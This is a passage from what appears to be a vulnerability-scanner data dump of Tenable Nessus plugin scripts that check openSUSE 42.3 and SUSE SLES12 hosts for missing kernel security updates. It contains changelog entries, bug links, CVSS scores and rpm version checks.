patches.arch/powerpc-bigmem-16-mm-Add-addr_limit-to-mm_c\n ontext-and-use-it-t.patch.\n\n - Revert 'x86/acpi: Enable MADT APIs to return disabled\n apicids' (bnc#1056230).\n\n - Revert 'x86/acpi: Set persistent cpuid <-> nodeid\n mapping when booting' (bnc#1056230).\n\n - s390/cpcmd,vmcp: avoid GFP_DMA allocations (bnc#1060249,\n LTC#159112).\n\n - s390/qdio: avoid reschedule of outbound tasklet once\n killed (bnc#1060249, LTC#159885).\n\n - s390/topology: alternative topology for topology-less\n machines (bnc#1060249, LTC#159177).\n\n - s390/topology: always use s390 specific\n sched_domain_topology_level (bnc#1060249, LTC#159177).\n\n - s390/topology: enable / disable topology dynamically\n (bnc#1060249, LTC#159177).\n\n - sched/cpuset/pm: Fix cpuset vs. suspend-resume bugs\n (bnc#1012382).\n\n - scsi: fixup kernel warning during rmmod() (bsc#1052360).\n\n - scsi: libfc: fix a deadlock in fc_rport_work\n (bsc#1063695).\n\n - scsi: lpfc: Ensure io aborts interlocked with the target\n (bsc#1056587).\n\n - scsi: qedi: off by one in qedi_get_cmd_from_tid()\n (bsc#1004527, FATE#321744).\n\n - scsi: qla2xxx: Fix uninitialized work element\n (bsc#1019675,FATE#321701).\n\n - scsi: scsi_transport_fc: Also check for NOTPRESENT in\n fc_remote_port_add() (bsc#1037890).\n\n - scsi: scsi_transport_fc: set scsi_target_id upon rescan\n (bsc#1058135).\n\n - scsi: sd: Do not override max_sectors_kb sysfs setting\n (bsc#1025461).\n\n - scsi: sd: Remove LBPRZ dependency for discards\n (bsc#1060985). This patch is originally part of a larger\n series which can't be easily backported to SLE-12. For a\n reasoning why we think it's safe to apply, see\n bsc#1060985, comment 20.\n\n - scsi: sg: close race condition in\n sg_remove_sfp_usercontext() (bsc#1064206).\n\n - scsi: sg: do not return bogus Sg_requests (bsc#1064206).\n\n - scsi: sg: only check for dxfer_len greater than 256M\n (bsc#1064206).\n\n - sh_eth: use correct name for ECMR_MPDE bit\n (bnc#1012382).\n\n - staging: iio: ad7192: Fix - use the dedicated reset\n function avoiding dma from stack (bnc#1012382).\n\n - stm class: Fix a use-after-free (bnc#1012382).\n\n - supported.conf: enable dw_mmc-rockchip driver\n References: bsc#1064064\n\n - team: call netdev_change_features out of team lock\n (bsc#1055567).\n\n - team: fix memory leaks (bnc#1012382).\n\n - ttpci: address stringop overflow warning (bnc#1012382).\n\n - tty: goldfish: Fix a parameter of a call to free_irq\n (bnc#1012382).\n\n - usb: chipidea: vbus event may exist before starting\n gadget (bnc#1012382).\n\n - usb: core: harden cdc_parse_cdc_header (bnc#1012382).\n\n - usb: devio: Do not corrupt user memory (bnc#1012382).\n\n - usb: dummy-hcd: fix connection failures (wrong speed)\n (bnc#1012382).\n\n - usb: dummy-hcd: Fix erroneous synchronization change\n (bnc#1012382).\n\n - usb: dummy-hcd: fix infinite-loop resubmission bug\n (bnc#1012382).\n\n - usb: fix out-of-bounds in usb_set_configuration\n (bnc#1012382).\n\n - usb: gadgetfs: fix copy_to_user while holding spinlock\n (bnc#1012382).\n\n - usb: gadgetfs: Fix crash caused by inadequate\n synchronization (bnc#1012382).\n\n - usb: gadget: inode.c: fix unbalanced spin_lock in\n ep0_write (bnc#1012382).\n\n - usb: gadget: mass_storage: set msg_registered after msg\n registered (bnc#1012382).\n\n - usb: gadget: udc: atmel: set vbus irqflags explicitly\n (bnc#1012382).\n\n - usb: g_mass_storage: Fix deadlock when driver is unbound\n (bnc#1012382).\n\n - usb: Increase quirk delay for USB devices (bnc#1012382).\n\n - usb: pci-quirks.c: Corrected timeout values used in\n handshake (bnc#1012382).\n\n - usb: plusb: Add support for PL-27A1 (bnc#1012382).\n\n - usb: renesas_usbhs: fix the BCLR setting condition for\n non-DCP pipe (bnc#1012382).\n\n - usb: renesas_usbhs: fix usbhsf_fifo_clear() for RX\n direction (bnc#1012382).\n\n - usb: serial: mos7720: fix control-message error handling\n (bnc#1012382).\n\n - usb: serial: mos7840: fix control-message error handling\n (bnc#1012382).\n\n - usb-storage: unusual_devs entry to fix write-access\n regression for Seagate external drives (bnc#1012382).\n\n - usb: uas: fix bug in handling of alternate settings\n (bnc#1012382).\n\n - uwb: ensure that endpoint is interrupt (bnc#1012382).\n\n - uwb: properly check kthread_run return value\n (bnc#1012382).\n\n - x86/acpi: Restore the order of CPU IDs (bnc#1056230).\n\n - x86/cpu: Remove unused and undefined\n __generic_processor_info() declaration (bnc#1056230).\n\n - x86 edac, sb_edac.c: Take account of channel hashing\n when needed (bsc#1061721).\n\n - x86/mshyperv: Remove excess #includes from mshyperv.h\n (fate#320485).\n\n - xfs: handle error if xfs_btree_get_bufs fails\n (bsc#1059863).\n\n - xfs: remove kmem_zalloc_greedy (bnc#1012382).\n\n - xhci: fix finding correct bus_state structure for USB\n 3.1 hosts (bnc#1012382).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1004527\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1012382\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1015342\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1015343\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1019675\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1019680\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1019695\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1019699\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1020412\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1020989\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1022595\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1022604\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1022912\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1024346\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1024373\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1025461\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1032150\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1034075\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1037579\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1037890\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1050471\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1052360\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1055567\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1056230\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1056427\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1056587\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1056596\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1058135\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1059863\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1060249\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1060400\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1060985\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1061451\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1061721\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1061775\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1062279\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1062520\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1062962\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1063102\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1063349\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1063460\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1063475\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1063501\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1063509\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1063520\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1063570\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1063667\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1063695\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1064064\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1064206\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1064388\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1064436\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=963575\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=964944\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=966170\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=966172\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=966186\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=966191\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=966316\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=966318\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=969476\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=969477\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=971975\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected the Linux Kernel packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-debug-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-debug-base-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-debug-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-debug-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-debug-devel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-default-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-default-base-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-default-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-default-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-default-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-docs-html\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-docs-pdf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-macros\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-obs-build\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-obs-build-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-obs-qa\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-source\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-source-vanilla\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-syms\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-vanilla\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-vanilla-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-vanilla-base-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-vanilla-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-vanilla-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-vanilla-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.3\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/03/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/10/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/10/26\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"II\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE42\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"42.3\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(x86_64)$\") audit(AUDIT_ARCH_NOT, \"x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE42.3\", reference:\"kernel-debug-4.4.92-31.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"kernel-debug-base-4.4.92-31.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"kernel-debug-base-debuginfo-4.4.92-31.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"kernel-debug-debuginfo-4.4.92-31.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"kernel-debug-debugsource-4.4.92-31.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"kernel-debug-devel-4.4.92-31.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"kernel-debug-devel-debuginfo-4.4.92-31.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"kernel-default-4.4.92-31.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"kernel-default-base-4.4.92-31.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"kernel-default-base-debuginfo-4.4.92-31.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"kernel-default-debuginfo-4.4.92-31.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"kernel-default-debugsource-4.4.92-31.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"kernel-default-devel-4.4.92-31.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"kernel-devel-4.4.92-31.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"kernel-docs-html-4.4.92-31.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"kernel-docs-pdf-4.4.92-31.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"kernel-macros-4.4.92-31.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"kernel-obs-build-4.4.92-31.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"kernel-obs-build-debugsource-4.4.92-31.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"kernel-obs-qa-4.4.92-31.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"kernel-source-4.4.92-31.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"kernel-source-vanilla-4.4.92-31.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"kernel-syms-4.4.92-31.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"kernel-vanilla-4.4.92-31.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"kernel-vanilla-base-4.4.92-31.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"kernel-vanilla-base-debuginfo-4.4.92-31.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"kernel-vanilla-debuginfo-4.4.92-31.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"kernel-vanilla-debugsource-4.4.92-31.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"kernel-vanilla-devel-4.4.92-31.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel-devel / kernel-macros / kernel-source / etc\");\n}\n", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-01T04:28:20", "bulletinFamily": "scanner", "description": "The SUSE Linux Enterprise 12 SP2 kernel was updated to 4.4.74 to\nreceive various security and bugfixes. The following security bugs\nwere fixed :\n\n - CVE-2017-1000111: fix race condition in net-packet code\n that could be exploited to cause out-of-bounds memory\n access (bsc#1052365).\n\n - CVE-2017-1000112: fix race condition in net-packet code\n that could have been exploited by unprivileged users to\n gain root access. (bsc#1052311).\n\nThe update package also includes non-security fixes. See advisory for\ndetails.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "modified": "2020-07-02T00:00:00", "id": "SUSE_SU-2017-2131-1.NASL", "href": "https://www.tenable.com/plugins/nessus/102415", "published": "2017-08-11T00:00:00", "title": "SUSE SLED12 / SLES12 Security Update : kernel (SUSE-SU-2017:2131-1)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2017:2131-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(102415);\n script_version(\"3.12\");\n script_cvs_date(\"Date: 2019/09/11 11:22:16\");\n\n script_cve_id(\"CVE-2017-1000111\", \"CVE-2017-1000112\");\n\n script_name(english:\"SUSE SLED12 / SLES12 Security Update : kernel (SUSE-SU-2017:2131-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The SUSE Linux Enterprise 12 SP2 kernel was updated to 4.4.74 to\nreceive various security and bugfixes. The following security bugs\nwere fixed :\n\n - CVE-2017-1000111: fix race condition in net-packet code\n that could be exploited to cause out-of-bounds memory\n access (bsc#1052365).\n\n - CVE-2017-1000112: fix race condition in net-packet code\n that could have been exploited by unprivileged users to\n gain root access. (bsc#1052311).\n\nThe update package also includes non-security fixes. See advisory for\ndetails.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1038078\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1043652\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1048914\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1052311\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1052365\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-1000111/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-1000112/\"\n );\n # https://www.suse.com/support/update/announcement/2017/suse-su-20172131-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?71e11132\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Workstation Extension 12-SP2:zypper in -t patch\nSUSE-SLE-WE-12-SP2-2017-1319=1\n\nSUSE Linux Enterprise Software Development Kit 12-SP2:zypper in -t\npatch SUSE-SLE-SDK-12-SP2-2017-1319=1\n\nSUSE Linux Enterprise Server for Raspberry Pi 12-SP2:zypper in -t\npatch SUSE-SLE-RPI-12-SP2-2017-1319=1\n\nSUSE Linux Enterprise Server 12-SP2:zypper in -t patch\nSUSE-SLE-SERVER-12-SP2-2017-1319=1\n\nSUSE Linux Enterprise Live Patching 12:zypper in -t patch\nSUSE-SLE-Live-Patching-12-2017-1319=1\n\nSUSE Linux Enterprise High Availability 12-SP2:zypper in -t patch\nSUSE-SLE-HA-12-SP2-2017-1319=1\n\nSUSE Linux Enterprise Desktop 12-SP2:zypper in -t patch\nSUSE-SLE-DESKTOP-12-SP2-2017-1319=1\n\nSUSE Container as a Service Platform ALL:zypper in -t patch\nSUSE-CAASP-ALL-2017-1319=1\n\nOpenStack Cloud Magnum Orchestration 7:zypper in -t patch\nSUSE-OpenStack-Cloud-Magnum-Orchestration-7-2017-1319=1\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Linux Kernel UDP Fragmentation Offset (UFO) Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-base-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-extra\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-extra-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-man\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-syms\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/10/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/08/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/08/11\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") 